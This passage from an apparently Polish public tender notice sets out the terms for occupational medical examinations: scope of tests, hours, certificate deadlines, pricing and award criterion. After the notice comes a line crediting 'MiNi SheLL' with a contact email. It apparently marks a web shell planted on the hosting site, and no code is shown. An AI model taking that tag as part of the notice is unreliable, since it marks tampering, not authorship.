9) Stosowne badanie musi być przeprowadzone przez lekarza medycyny pracy, lekarza uprawnionego do badań lekarskich osób kierującymi pojazdami lub psychologa w zależności od rodzaju badania wymienionego w skierowaniu na badania. Zakres badań określają przepisy w zakresie przeprowadzenia badań profilaktycznych pracowników, mogą to być np. badania psychotechniczne, badania kału na nosicielstwo, laryngolog, neurolog, okulista, EKG, audiometr, spirometr, glukoza, alat, aspat, bilirubina całkowita, morfologia z rozmazem, RTG płuc itd. Powyższy zakres nie stanowi katalogu zamkniętego badań. W zależności od stanowiska pracy określonego w skierowaniu na badania zakres badań może zostać poszerzony o konieczne badania specjalistyczne lub laboratoryjne zgodnie z obowiązującymi przepisami w zakresie przeprowadzenia badań profilaktycznych.
10)  Wykonawca powinien zapewnić możliwość bieżącej (codziennej) realizacji pełnego zakresu badań (od poniedziałku do piątku) w godzinach od 7.00 do 15.00.
11)  Badanie lekarskie będą wykonywane na podstawie indywidualnego skierowania wydanego przez Zamawiającego.
12)  W wyniku przeprowadzonego badania lekarz przekazuje osobie badanej 2 egzemplarze stosownego zaświadczenia lekarskiego (orzeczenia), z których jeden egzemplarz przeznaczony będzie dla Zamawiającego,
13)  Badanie musi być zakończone wydaniem, najpóźniej w ciągu 7 dni od daty skontaktowania się osoby skierowanej z przychodnią, stosownego zaświadczenia lekarskiego; w przypadku badań specjalistycznych najpóźniej w terminie 16 dni, w przypadku badań sanitarno-epidemiologicznych najpóźniej w terminie 21 dni.
14)  Wykonawca może zlecić wykonywanie niektórych świadczeń w szczególności badań diagnostycznych i specjalistycznych konsultacji lekarskich zakładom opieki zdrowotnej lub podmiotom uprawnionym do wykonywania tych świadczeń na podstawie odrębnych przepisów, ponosząc ich koszty w ramach wynagrodzenia zgodnie ze złożonym formularzem ofertowym w ramach poszczególnych pozycji cenowych (w zależności od rodzaju badania).
15)  Wykonawca będzie pobierał należności za wykonanie badania zgodnie ze złożonym formularzem ofertowym w ramach poszczególnych pozycji cenowych (w zależności od rodzaju badania),
16)  Ceny jednostkowe poszczególnych badań wskazane w formularzu ofertowym powinny uwzględnić wszystkie koszty związane z przeprowadzeniem badań i wydaniem stosownego zaświadczenia.
17)  Zamawiający będzie kierował osoby do Wykonawcy od poniedziałku do piątku w ustalonych godzinach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com